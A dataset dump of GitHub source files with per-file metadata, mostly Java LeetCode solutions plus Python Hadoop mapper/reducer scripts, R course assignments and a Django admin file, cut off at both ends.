{\n\t\t\tif(s.charAt(low ++) != s.charAt(high --)) {return false;}\n\t\t}\n\t\treturn true;\n\t}" }, { "alpha_fraction": 0.5021528601646423, "alphanum_fraction": 0.5048438906669617, "avg_line_length": 31.61403465270996, "blob_id": "aec6c9cc6198092477ca22084e7bbfb19176dd3e", "content_id": "8856af32031ca186f0978548139d35c94b2fe0db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1858, "license_type": "no_license", "max_line_length": 105, "num_lines": 57, "path": "/LCA.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public TreeNode lowestCommonAncestor(TreeNode root, TreeNode p, TreeNode q) {\n if (root == null) {\n return null;\n } \n \n if (root == p || root == q) {\n return root;\n }\n \n TreeNode left = lowestCommonAncestor(root.left, p, q);\n TreeNode right = lowestCommonAncestor(root.right, p, q);\n \n if (left == null) {\n return right;\n } else if (right == null) {\n return left;\n } else {\n return root;\n }\n }\n}\n\nclass Solution {\n boolean pflag = false;\n boolean qflag = false;\n public TreeNode lowestCommonAncestor(TreeNode root, TreeNode p, TreeNode q) {\n List<TreeNode> plist = new ArrayList<TreeNode>();\n List<TreeNode> qlist = new ArrayList<TreeNode>();\n dfs(root, plist, qlist, p.val, q.val, 0);\n int compare = Math.min(plist.size(), qlist.size()) - 1;\n for(int i = compare; i >= 0; i --) {\n if(plist.get(i).val == qlist.get(i).val) {\n return plist.get(i);\n }\n }\n return root;\n }\n \n public void dfs(TreeNode root, List<TreeNode> plist, List<TreeNode> qlist, int p, int q, int level) {\n if(root == null || (qflag && pflag)) {return;}\n if(!pflag) {\n if(plist.size() <= level) {plist.add(root);}\n else {plist.set(level, root);}\n }\n if(!qflag) {\n if(qlist.size() <= level) {qlist.add(root);}\n else {qlist.set(level, root);}\n }\n if(root.val == p) {pflag = true;} \n else if(root.val == q) {qflag = true;}\n dfs(root.left, plist, qlist, p, q, level + 1);\n dfs(root.right, plist, qlist, p, q, level + 1);\n if(!pflag) {plist.remove(root);}\n if(!qflag) {qlist.remove(root);}\n }\n}" }, { "alpha_fraction": 0.621107280254364, "alphanum_fraction": 0.6314879059791565, "avg_line_length": 26.571428298950195, "blob_id": "55c484ad7ed0acfee05689fc41575697f0acd2b7", "content_id": "3c5565cf45fac823d678707445ec63e3cfb495a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 578, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/Zigzag_Level_Order_Traversal_2.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public List<List<Integer>> LevelOrder(TreeNode root) {\n\t\tList<List<Integer>> result = new ArrayList<List<Integer>>();\n\t\tDFS(root, result, 0);\n\t\treturn result;\n\t}\n\t\n\tpublic void DFS(TreeNode curr, List<List<Integer>> result, int level) {\n\t\tif(curr == null) {return;}\n\t\tif(result.size() <= level) {\n\t\t\tList<Integer> temp = new ArrayList<Integer>();\n\t\t\tresult.add(temp);\n\t\t}\n\t\tList<Integer> temp = result.get(level);\n\t\tif(level % 2 == 0) {\n\t\t\ttemp.add(curr.val);\n\t\t} else {\n\t\t\ttemp.add(0, curr.val);\n\t\t}\n\t\tDFS(curr.left, result, level + 1);\n\t\tDFS(curr.right, result, level + 1);\n\t}" }, { "alpha_fraction": 0.6226053833961487, "alphanum_fraction": 0.6245210766792297, "avg_line_length": 31.6875, "blob_id": "a6c9e2ff523c78436c3faa35f217b69d4fd5d535", "content_id": "87dafbbffebdd4efc41da3c46f5fa23159547795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 522, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/Group_Anagrams.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<String>> groupAnagrams(String[] strs) {\n if(strs == null || strs.length == 0) {return new ArrayList<List<String>>();}\n\t\tMap<String, List<String>> map = new HashMap<String, List<String>>();\n\t\tfor(String str : strs) {\n\t\t\tchar[] alp = str.toCharArray();\n\t\t\tArrays.sort(alp);\n\t\t\tString key = String.valueOf(alp);\n\t\t\tif(!map.containsKey(key)) {\n\t\t\t\tmap.put(key, new ArrayList<String>());\n\t\t\t}\n\t\t\tmap.get(key).add(str);\n\t\t}\n\t\treturn new ArrayList<List<String>>(map.values());\n }\n}" }, { "alpha_fraction": 0.44626864790916443, "alphanum_fraction": 0.4470149278640747, "avg_line_length": 28.15217399597168, "blob_id": "0f80cacff8a1aa1071bb57a9c2c990ae83c851ab", "content_id": "5af7773c0969e19ff5e51a24c0bd3573b2b80874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 65, "num_lines": 46, "path": "/Find_Largest_Value_in_Each_Tree_Row.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n public List<Integer> largestValues(TreeNode root) {\n List<Integer> result = new ArrayList<Integer>();\n Queue<TreeNode> lists = new LinkedList<TreeNode>();\n if(root == null){\n return result;\n }\n result.add(root.val);\n lists.offer(root);\n \n while(lists.peek() != null){\n List<TreeNode> temp_list = new ArrayList<TreeNode>();\n int max = Integer.MIN_VALUE;\n while(lists.peek() != null){\n TreeNode temp = lists.poll();\n TreeNode left = temp.left;\n TreeNode right = temp.right;\n if(left != null){\n max = Math.max(max, left.val);\n temp_list.add(left);\n }\n if(right != null){\n max = Math.max(max, right.val);\n temp_list.add(right);\n }\n }\n if(temp_list.size() != 0){\n result.add(max);\n }\n for(TreeNode i : temp_list){\n lists.offer(i);\n }\n }\n \n return result;\n }\n}" }, { "alpha_fraction": 0.4899497628211975, "alphanum_fraction": 0.5025125741958618, "avg_line_length": 29.69230842590332, "blob_id": "270ad8cec228722965107f735fc6c3d8c99612cb", "content_id": "bc9a461461e7c815a6024b77ca114e8c5846905e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 398, "license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/Find_All_Numbers_Disappeared_in_an_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<Integer> findDisappearedNumbers(int[] nums) {\n List<Integer> results = new ArrayList<Integer>();\n int[] counts = new int[nums.length];\n for(int num : nums) {\n counts[num - 1] += 1;\n }\n for(int i = 0; i < nums.length; i ++) {\n if(counts[i] == 0) {results.add(i + 1);}\n }\n return results;\n }\n}" }, { "alpha_fraction": 0.38100820779800415, "alphanum_fraction": 0.39273154735565186, "avg_line_length": 30.629629135131836, "blob_id": "50156577ca4f91d34a36d3e1b29f7d46102c4f4d", "content_id": "f21b286f73f97fbde5940899f1028a02bd5493e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 861, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/Set_Matrix_Zeroes.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public void setZeroes(int[][] matrix) {\n int m = matrix.length;\n int n = matrix[0].length;\n List<String> zeros = new ArrayList<String>();\n for(int i = 0; i < m; i ++){\n for(int j = 0; j < n; j ++){\n if(matrix[i][j] == 0){\n zeros.add(i + \"-\" + j);\n }\n }\n }\n //采用Iterator遍历HashMap \n Iterator it = zeros.iterator(); \n while(it.hasNext()) { \n String[] zero = it.next().toString().split(\"-\");\n int key = Integer.parseInt(zero[0]);\n int value = Integer.parseInt(zero[1]);\n for(int i = 0; i < m; i ++){\n matrix[i][value] = 0;\n }\n for(int i = 0; i < n; i ++){\n matrix[key][i] = 0;\n }\n } \n }\n}" }, { "alpha_fraction": 0.5029940009117126, "alphanum_fraction": 0.5119760632514954, "avg_line_length": 24.69230842590332, "blob_id": "62b122bb3c6adbe7c477835f86e446336bb673e5", "content_id": "106c7b8da632f2ef8a06a0742cc1458baf7aff07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 668, "license_type": "no_license", "max_line_length": 67, "num_lines": 26, "path": "/findKMax.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "\tpublic static void findKmax(int[] nums, int low, int high, int k) {\n\t\tif(low > high) {return;}\n\t\tint i = low;\n\t\tint j = high;\n\t\tint index = nums[i];\n\t\twhile(i < j) {\n\t\t\twhile(i < j && nums[j] >= index) {j --;}\n\t\t\tif(i < j) {nums[i ++] = nums[j];}\n\t\t\twhile(i < j && nums[i] < index) {i ++;}\n\t\t\tif(i < j) {nums[j --] = nums[i];}\n\t\t}\n\t\tnums[i] = index;\n\t\tif(i == k) {\n\t\t\treturn;\n\t\t} else if(i < k) {\n\t\t\tfindKmax(nums, i + 1, high, k);\n\t\t} else {\n\t\t\tfindKmax(nums, low, i - 1, k);\n\t\t}\n\t}\n\t\n\tpublic static int findK(int[] nums, int k) {\n\t\tif(nums == null || k > nums.length) {return Integer.MIN_VALUE;}\n\t\tfindKmax(nums, 0, nums.length - 1, k - 1);\n\t\treturn nums[k - 1];\n\t}" }, { "alpha_fraction": 0.481389582157135, "alphanum_fraction": 0.4900744557380676, "avg_line_length": 35.681819915771484, "blob_id": "aa27c3ecd1adff86d0a0a583d5d1ea6028c867e5", "content_id": "7e6bc79e61a80df9e02a29ac17ea28a9c0791182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 806, "license_type": "no_license", "max_line_length": 77, "num_lines": 22, "path": "/Permutations.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<Integer>> permute(int[] nums) {\n List<List<Integer>> result = new ArrayList<List<Integer>>();\n int length = nums.length;\n if(length == 0){return result;}\n List<Integer> num0 = new ArrayList<Integer>();\n num0.add(nums[0]);\n result.add(num0);\n for(int i = 1; i < length; i ++){\n List<List<Integer>> result_temp = new ArrayList<List<Integer>>();\n for(List<Integer> temp : result){\n for(int j = 0; j <= i; j ++){\n List<Integer> temp_arr = new ArrayList<Integer>(temp);\n temp_arr.add(j,nums[i]);\n result_temp.add(temp_arr);\n }\n }\n result = result_temp;\n }\n return result;\n }\n}" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.34493669867515564, "avg_line_length": 25.375, "blob_id": "418ae506aa32d2ecbd70fe7083d9c44c808abd28", "content_id": "e8c82898f537bb8d679a381e37119fa5d9443834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 632, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/Move_Zeroes.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public void moveZeroes(int[] nums) {\n int count = 0;\n int pos = 0;\n int start = nums.length - 1;\n for(int i = 0; i < nums.length; i ++) {\n if(nums[i] == 0) {\n if(count == 0) {start = i;}\n count ++;\n }\n }\n pos = start;\n for(int i = start + 1; i < nums.length; i ++) {\n if(nums[i] != 0) {\n nums[pos] = nums[i];\n pos = pos + 1;\n }\n }\n for(int i = nums.length - 1; count > 0; i --) {\n nums[i] = 0;\n count --;\n }\n }\n}" }, { "alpha_fraction": 0.520844042301178, "alphanum_fraction": 0.5352547764778137, "avg_line_length": 35.67924499511719, "blob_id": "9f990a55ff68a659217006acbed82b54355178a7", "content_id": "da47fa07f6b6b253b2e4f5b947e92842eeadf240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1943, "license_type": "no_license", "max_line_length": 126, "num_lines": 53, "path": "/mei_tuan.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "import java.util.*;\n\npublic class Main{\n static int reuslt = 0;\n static int last = 0;\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int n = scanner.nextInt();\n Set<Integer> visited = new HashSet<>();\n Map<Integer, Integer> count = new HashMap<>();\n Map<Integer, List<Integer>> map = new HashMap<>();\n for(int i = 0; i < n - 1; i ++) {\n int x1 = scanner.nextInt();\n int x2 = scanner.nextInt();\n count.put(x1, count.getOrDefault(x1, 0));\n count.put(x2, count.getOrDefault(x2, 0));\n List<Integer> temp1 = map.getOrDefault(x1, new ArrayList<>());\n temp1.add(x2);\n map.put(x1, temp1);\n List<Integer> temp2 = map.getOrDefault(x2, new ArrayList<>());\n temp2.add(x2);\n map.put(x2, temp2);\n }\n dfs(1, n, count, map, visited);\n findLast(1, map, new HashSet<Integer>());\n System.out.println(reuslt - last);\n scanner.close();\n }\n\n public static void dfs(int x, int n, Map<Integer, Integer> count, Map<Integer, List<Integer>> map, Set<Integer> visited) {\n List<Integer> temp_list = map.get(x);\n visited.add(x);\n Collections.sort(temp_list, (a, b) -> (count.get(b) - count.get(a)));\n map.put(x, temp_list);\n boolean flag = false;\n for(int link : temp_list) {\n if(visited.contains(link)) {continue;}\n flag = true;\n reuslt ++;\n dfs(link, n, count, map, visited);\n reuslt ++;\n }\n }\n\n public static void findLast(int x, Map<Integer, List<Integer>> map, Set<Integer> visited) {\n List<Integer> temp_list = map.get(x);\n if(temp_list.size() == 1) {return;}\n int next = temp_list.get(temp_list.size() - 1);\n visited.add(x);\n last ++;\n findLast(next, map, visited);\n }\n}" }, { "alpha_fraction": 0.3245614171028137, "alphanum_fraction": 0.34210526943206787, "avg_line_length": 23.5, "blob_id": "f09215f256026a16b8768a31c1c21a641fba0438", "content_id": "32c43f4efcf01cda755e53d532058fd015329977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 342, "license_type": "no_license", "max_line_length": 42, "num_lines": 14, "path": "/Unique_Paths.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int uniquePaths(int m, int n) {\n int[] list = new int[n];\n for(int z = 0; z < n; z ++){\n list[z] = 1;\n }\n for(int i = 1; i < m; i ++){\n for(int j = 1; j < n; j ++){\n list[j] += list[j - 1];\n }\n }\n return list[n - 1];\n }\n}" }, { "alpha_fraction": 0.32822084426879883, "alphanum_fraction": 0.349693238735199, "avg_line_length": 28.68181800842285, "blob_id": "f29ac82050b6e556b655e9bab744d2f941b33f12", "content_id": "8b680d9921b1feabb6d08b07af5202f0d139381b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 652, "license_type": "no_license", "max_line_length": 49, "num_lines": 22, "path": "/Non-decreasing_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean checkPossibility(int[] nums) {\n if(nums.length <= 2){return true;}\n int count = 0;\n for(int i = 0;i < nums.length - 2;i ++){\n if(nums[i] > nums[i + 1]){\n count ++;\n if(count == 2){return false;}\n }\n if(nums[i + 1] > nums[i + 2]){\n if(nums[i] < nums[i + 2]){\n nums[i + 1] = nums[i + 2];\n }else{\n nums[i + 2] = nums[i + 1];\n }\n count ++;\n if(count == 2){return false;}\n }\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.3038141131401062, "alphanum_fraction": 0.31389740109443665, "avg_line_length": 27.172840118408203, "blob_id": "5a269a1949b54a31d02adaab0e2e6db6b4ec29ca", "content_id": "54f85f5a437b886bb4aff1e4c0840b5af073948d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2281, "license_type": "no_license", "max_line_length": 52, "num_lines": 81, "path": "/Trapping_Rain_Water.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int trap(int[] height) {\n int max = 0;\n int total = 0;\n int length = height.length;\n for(int num : height){\n max = Math.max(max, num);\n }\n for(int i = 0; i < max; i ++){\n int left = -1;\n int right = -1;\n for(int j = 0; j < length; j ++){\n if(height[j] - i > 0){\n right = j;\n if(left != -1){\n total += right - left - 1;\n }\n left = right;\n }\n }\n }\n return total;\n }\n}\n\n//Much more faster\nclass Solution {\n public int trap(int[] height) {\n int length = height.length;\n int max = 0;\n int total = 0;\n int max_pos = 0;\n for(int i = 0; i < length; i ++){\n if(height[i] > max) {\n max = height[i];\n max_pos = i;\n }\n }\n int sum = 0;\n int entity = 0;\n int max_temp = 0;\n boolean flag = false;\n for(int i = 0; i < max_pos; i ++) {\n if(!flag && height[i] != 0) {\n max_temp = height[i];\n flag = true;\n }\n if(flag) {\n entity += height[i];\n if(height[i] <= max_temp) {\n sum += max_temp;\n } else {\n sum += height[i];\n max_temp = height[i];\n }\n }\n }\n total += sum - entity;\n sum = 0;\n entity = 0;\n max_temp = 0;\n flag = false;\n for(int i = length - 1; i > max_pos; i --) {\n if(!flag && height[i] != 0) {\n max_temp = height[i];\n flag = true;\n }\n if(flag) {\n entity += height[i];\n if(height[i] <= max_temp) {\n sum += max_temp;\n } else {\n sum += height[i];\n max_temp = height[i];\n }\n }\n }\n total += sum - entity;\n return total;\n }\n}" }, { "alpha_fraction": 0.6225563883781433, "alphanum_fraction": 0.6285714507102966, "avg_line_length": 29.272727966308594, "blob_id": "0b7e8e7d44cea39f0dd49c7f2874f84291cc75a5", "content_id": "458712fecd5cd81b4c7f7704b3582a4eb83ca850", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 665, "license_type": "no_license", "max_line_length": 88, "num_lines": 22, "path": "/Combination_Sum.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n static List<List<Integer>> lists;\n \n\tpublic List<List<Integer>> combinationSum(int[] candidates, int target) {\n\t\tlists = new ArrayList<List<Integer>>();\n\t\tArrays.sort(candidates);\n\t\tbackTracing(candidates, 0, target, new ArrayList<Integer>());\n return lists;\n }\n\t\n\tpublic static void backTracing(int[] nums, int index, int target, List<Integer> list) {\n\t\tif(target > 0) {\n\t\t\tfor(int i = index; i < nums.length && target >= nums[i]; i ++) {\n\t\t\t\tlist.add(nums[i]);\n\t\t\t\tbackTracing(nums, i, target - nums[i], list);\n\t\t\t\tlist.remove(list.size() - 1);\n\t\t\t}\n\t\t} else if(target == 0) {\n\t\t\tlists.add(new ArrayList<Integer>(list));\n\t\t}\n\t}\n}" } ]
32
L3ftsid3/Classes
https://github.com/L3ftsid3/Classes
64234883501ab880d7d935a4951af215f41e9b3f
e3401f0c7df1686384612cdb750d07ca4534689b
b052e762e2df68a8bfae4a84bfc5be630dcede7a
refs/heads/master
2021-01-18T14:07:40.379529
2014-05-16T22:34:22
2014-05-16T22:34:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6173664331436157, "alphanum_fraction": 0.6221374273300171, "avg_line_length": 26.105262756347656, "blob_id": "c274e149a02a160e24d062e9c38f95285baa4826", "content_id": "d14818beba52a1bace58d8574c0d1d3c38cb8992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "no_license", "max_line_length": 66, "num_lines": 38, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex2reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\nmaxSale = 0\noldKey = None\n\n# Loop around the data\n# It will be in format key\\tvalue\n# Where key is the store name, val is the sale amount\n#\n# All the sales for a particular item will be presented, \n# then the key will change and we'll be dealing with the next item\n\nfor line in sys.stdin:\n data_mapped = line.strip().split(\"\\t\")\n if len(data_mapped) != 2:\n # Something has gone wrong. Skip the line\n continue\n \n thisKey, thisSale = data_mapped\n \n # When key has just been changed (From Miami to NYC stores)\n if oldKey and oldKey != thisKey:\n # print result from oldKey (previous store)\n print\"{0}\\t{1}\".format(oldKey, maxSale)\n # Change the key to the new store\n oldKey = thisKey\n #Reset maxSale value for the new store to compute new max\n maxSale = 0\n \n oldKey = thisKey\n \n if float(thisSale) > float(maxSale):\n maxSale = float(thisSale)\n \nif oldKey != None:\n print oldKey, \"\\t\", maxSale\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6445086598396301, "alphanum_fraction": 0.6466763019561768, "avg_line_length": 29.021739959716797, "blob_id": "94f335a8976864bbaf971503881411b97b563c5c", "content_id": "dd2a9ef8aae1e150d416d86a3dbb3ed9b96dfe33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 90, "num_lines": 46, "path": "/Data-Analysis/R-Programming/Project/cachematrix.R", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "## Caching the Inverse of a Matrix\n\n## The Function makeCacheMatrix has:\n## INPUT: 1 Matrix (Assumed Invertible)\n## OUTPUT: A list of 4 functions that will:\n## set(y) - Sets the matrix Value as y\n## get() - Get the Matrix X\n## setinverse(inverse) - Sets the inverse value for the matrix\n## getinverse - Get the inverse for the Matrix\n\n## This function creates a special \"matrix\" object that can cache its inverse.\n\nmakeCacheMatrix <- function(x = matrix()) {\n inv <- NULL\n set <- function(y) {\n x <<- as.matrix(y)\n inv <<- NULL\n }\n get <- function() x\n setinverse <- function(inverse) inv <<- inverse\n getinverse <- function() inv\n list(set = set, get = get,\n setinverse = setinverse,\n getinverse = getinverse)\n}\n\n\n\n## This Function Checks if the inverse of the Matrix has been cached\n## If so it returns that value (without recalculating), \n## if not it will calculate it and cache it using the makeCacheMatrix function\n## INPUT: 1 makeCacheMatrix (Result of using the function makeCacheMatrix with the Matrix)\n## OUTPUT: the inverse of the Matrix\n\ncacheSolve <- function(x, ...) {\n ## Return a matrix that is the inverse of 'x'\n inv <- x$getinverse()\n if(!is.null(inv)) {\n message(\"getting cached data\")\n return(inv)\n }\n data <- x$get()\n inv <- solve(data, ...)\n x$setinverse(inv)\n inv\n}\n\n\n\n" }, { "alpha_fraction": 0.5891340970993042, "alphanum_fraction": 0.615166962146759, "avg_line_length": 32.980770111083984, "blob_id": "37ca789dcecbef547b00ee00c659608f015b1979", "content_id": "7d3310863c4332add9969bbbad527f92dd3081e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 119, "num_lines": 52, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project-Week-3-Part2/ex04mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \n# Format of each line is:\n# 10.223.157.186 - - [15/Jul/2009:15:50:35 -0700] \"GET /assets/js/lowpro.js HTTP/1.1\" 200 10469\n# %h %l %u %t \\\"%r\\\" %>s %b\n# IP client_ID client_username time request status_code object_size\n#\n# We need hits to a certain path. \n# The request path is extracted from the request. Since we need hits the value will be 1 [KEY: request_path , VALUE: 1]\n# We need to write them out to standard output, separated by a tab\n \n \n# To better split a log\n# p = re.compile(\n# '([^ ]*) ([^ ]*) ([^ ]*) \\[([^]]*)\\] \"([^\"]*)\" ([^ ]*) ([^ ]*)'\n# )\n\n# for line in file.readlines():\n# m = p.match(line)\n# if not m:\n# continue\n# host, ignore, user, date, request, status, size = m.groups()\n\n\nimport sys\nreq_path_array = []\n \nfor line in sys.stdin:\n data = line.strip().split(\" \")\n if len(data) == 10:\n # time and zone will have a square bracket to remove with regex (in this mapper it's not needed)\n IP, client_ID, client_username, time, zone, req_method, req_path, protocol, status_code, object_size = data\n # request_path = request.split(\" \")[1]\n # print \"Path\" + str(req_path)\n req_path_array.append(req_path)\n \n# Optimize mapper phase by doing a small reduce phase within the same mapper (saves time on shuffling phase)\ndef add_values_within_mapper(key_array):\n dict = {}\n for element in range(len(key_array)):\n if not(key_array[element] in dict):\n dict[key_array[element]] = 1\n else:\n dict[key_array[element]] += 1\n return dict\n \ndef print_map_phase(dict):\n for key, value in dict.items():\n print\"{0}\\t{1}\".format(key, value)\n \nadded_values = add_values_within_mapper(req_path_array)\nprint_map_phase(added_values)\n" }, { "alpha_fraction": 0.77823406457901, "alphanum_fraction": 0.77823406457901, "avg_line_length": 29.4375, "blob_id": "774a0a5b3c8c3434f78e82236bccd316655b647b", "content_id": "2966d18c98477c6a93519baf876f5114bc903cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 66, "num_lines": 16, "path": "/Web-Development/Tutorials/Django-Landing-Page/landingpage/admin.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.db import models\nfrom django import forms\nfrom ckeditor.widgets import CKEditorWidget\nfrom landingpage.models import LandingPageForm, LandingPage, Pitch\n\nclass PitchAdmin(admin.ModelAdmin):\n\n formfield_overrides = {\n models.CharField: {'widget': forms.Textarea},\n models.TextField: {'widget': CKEditorWidget}\n }\n\nadmin.site.register(LandingPageForm)\nadmin.site.register(LandingPage)\nadmin.site.register(Pitch, PitchAdmin)\n" }, { "alpha_fraction": 0.6654545664787292, "alphanum_fraction": 0.6763636469841003, "avg_line_length": 27.947368621826172, "blob_id": "b01a88ee72cb50e3cdee9459e40ee1a01e12e881", "content_id": "3e627d00f6a766e39f60e1ebfcb4369526c3d3c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 550, "license_type": "no_license", "max_line_length": 82, "num_lines": 19, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex2mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Excercise 2 \n# Find the monetary value for the highest individual sale for each separate store.\n\n\n# Format of each line is:\n# date\\ttime\\tstore name\\titem description\\tcost\\tmethod of payment\n#\n# We want elements 3 (store name) and 5 (cost) [KEY = store name, VALUE = cost]\n# We need to write them out to std output, separated by a tab\n\nimport sys\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n if len(data) == 6:\n date, time, store, item, cost, payment = data\n print\"{0}\\t{1}\".format(store, cost)\n" }, { "alpha_fraction": 0.6776368021965027, "alphanum_fraction": 0.681601881980896, "avg_line_length": 36.64179229736328, "blob_id": "addd720abfc39d07a743c165c81864c7694845b2", "content_id": "6711159961aa7299c30f87049ecd40d005c4f3bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 86, "num_lines": 67, "path": "/Data-Analysis/Getting-and-Cleaning-Data/Project/run_analysis.R", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "## Helper Function to create tidy data on the Y data frame\nAdd_Y_labels <- function(Y_df, labels_df, column_names){\n for(i in 1:nrow(Y_df)){\n # First Iterations Create New Column and Change Column Names\n if(i == 1){\n Y_df[ncol(Y_df)+1] <- NA\n colnames(Y_df)<- c(\"activity_code\", \"activity\")\n }\n for(j in 1:nrow(labels_df)){\n if(Y_df[i,1] == labels_df[j,1]){ Y_df[i,2] <- as.character(labels_df[j,2]) }\n } \n }\n \n return(Y_df)\n}\n\n# Homework Peer Assignment - Cleaning Data\n\n# Load the Data (Read each file separately)\ntrain_Folder <- file.path('UCI HAR Dataset', 'train')\ntest_Folder <- file.path('UCI HAR Dataset', 'test')\n \nsubject_train <- read.table(file.path(train_Folder, \"subject_train.txt\"))\nY_train <- read.table(file.path(train_Folder, \"Y_train.txt\"))\nX_train <- read.table(file.path(train_Folder, \"X_train.txt\"))\n \nsubject_test <- read.table(file.path(test_Folder, \"subject_test.txt\"))\nY_test <- read.table(file.path(test_Folder, \"Y_test.txt\"))\nX_test <- read.table(file.path(test_Folder, \"X_test.txt\"))\n\n# Load file with features (columns) name for X_test and X_train\nX_names <- read.table(file.path('UCI HAR Dataset', 'features.txt'))\nX_names <- X_names[,2]\n\n# Add a Column to Y_train and Y_test to get activty_code and activity_name\nY_activity_labels <- read.table(file.path('UCI HAR Dataset', 'activity_labels.txt'))\nY_names <- c(\"activity_code\", \"activity\")\nUpdated_Y_train <- Add_Y_labels(Y_train,Y_activity_labels, Y_names )\nUpdated_Y_test <- Add_Y_labels(Y_test,Y_activity_labels, Y_names )\nsubject_name <- c(\"subject_ID\")\n\n# Combine the train and test datasets (X, Y and subject)\nunfiltered_X <- rbind(X_train, X_test)\nY <- rbind(Updated_Y_train, Updated_Y_test)\nsubject <- rbind(subject_train, subject_test)\n \n# Name all the dataframe columns (Y is already renamed using Add_Y_labels)\ncolnames(unfiltered_X) <- X_names\ncolnames(subject) <- c(\"ID\")\n\n# Filter to only variables with mean and std\nmeans <- grep(\"mean\\\\(\\\\)\", X_names)\nstds <- grep(\"std\\\\(\\\\)\", X_names)\nrelevant <- sort(c(means, stds))\nX <- unfiltered_X[relevant]\n\n# Combine (subject, Y, X) to obtain the complete dataframe\nall <- cbind(subject, Y, X)\n\n## Creates a second, independent tidy data set with the average of \n## each variable for each activity and each subject. \nrequire(reshape2)\ndf_melt <- melt(all, id = c(\"ID\", \"activity_code\", \"activity\"))\ntidy_data_set_complete <- dcast(df_melt, ID + activity_code+ activity~ variable, mean)\n\n# Prints the tidy data frame\nView(tidy_data_set_complete)\n" }, { "alpha_fraction": 0.6844512224197388, "alphanum_fraction": 0.6935975551605225, "avg_line_length": 35.44444274902344, "blob_id": "8756d07a102af02e4c6c3b38f9d2f2c102a1528f", "content_id": "6432bfb37f01d6b5730eab6aa1c521f846369bc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 656, "license_type": "no_license", "max_line_length": 126, "num_lines": 18, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex1mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#Excercise 1 - The three questions that you have to answer about this data set are:\n# Instead of breaking the 